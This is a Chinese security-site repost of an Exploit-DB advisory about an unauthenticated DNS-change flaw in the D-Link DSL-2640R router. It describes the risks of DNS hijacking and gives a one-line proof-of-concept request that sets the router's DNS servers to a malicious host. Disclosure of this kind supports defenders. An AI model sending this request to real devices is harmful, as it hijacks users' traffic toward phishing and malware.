ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全工具 → D-Link DSL-2640R – Unauthenticated DNS Change
D-Link DSL-2640R – Unauthenticated DNS Change

D-Link DSL-2640R – Unauthenticated DNS Change

评分:
下载地址
  • 软件介绍
  • 软件截图
  • 同类推荐
  • 相关文章

软件Tags: [db:tag]

EDB-ID: 43678 AuthorTodor Donev Published: 2018-01-17
CVE: N/A TypeWebapps PlatformHardware
E-DB VerifiedD-Link DSL-2640R - Unauthenticated DNS Change ExploitD-Link DSL-2640R - Unauthenticated DNS Change Download  View Raw Vulnerable App: N/A

 

D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
#
#  Firmware Version: UK_1.06 Hardware Version: B1
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Description:
#  The vulnerability exist in the web interface.
D-Link's various routers are susceptible to unauthorized DNS change.
#  The problem is when entering an invalid / wrong user and password.
#
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
#  DEVICES MAY AFFECTED.
#
#  Once modified, systems use foreign DNS servers,  which are
#  usually set up by cybercriminals. Users with vulnerable
#  systems or devices who try to access certain sites are
#  instead redirected to possibly malicious sites.
#
#  Modifying systems' DNS settings allows cybercriminals to
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites:
#       These sites can be phishing pages that
#       spoof well-known sites in order to
#       trick users into handing out sensitive
#       information.
#
#    o  Replacing ads on legitimate sites:
#       Visiting certain sites can serve users
#       with infected systems a different set
#       of ads from those whose systems are
#       not infected.
#
#    o  Controlling and redirecting network traffic:
#       Users of infected systems may not be granted
#       access to download important OS and software
#       updates from vendors like Microsoft and from
#       their respective security vendors.
#
#    o  Pushing additional malware:
#       Infected systems are more prone to other
#       malware infections (e.g., FAKEAV infection).
#
#
Proof of Concept:
http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS>

展开内容

软件截图

下载地址

  • PC版

推荐文章

用户评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网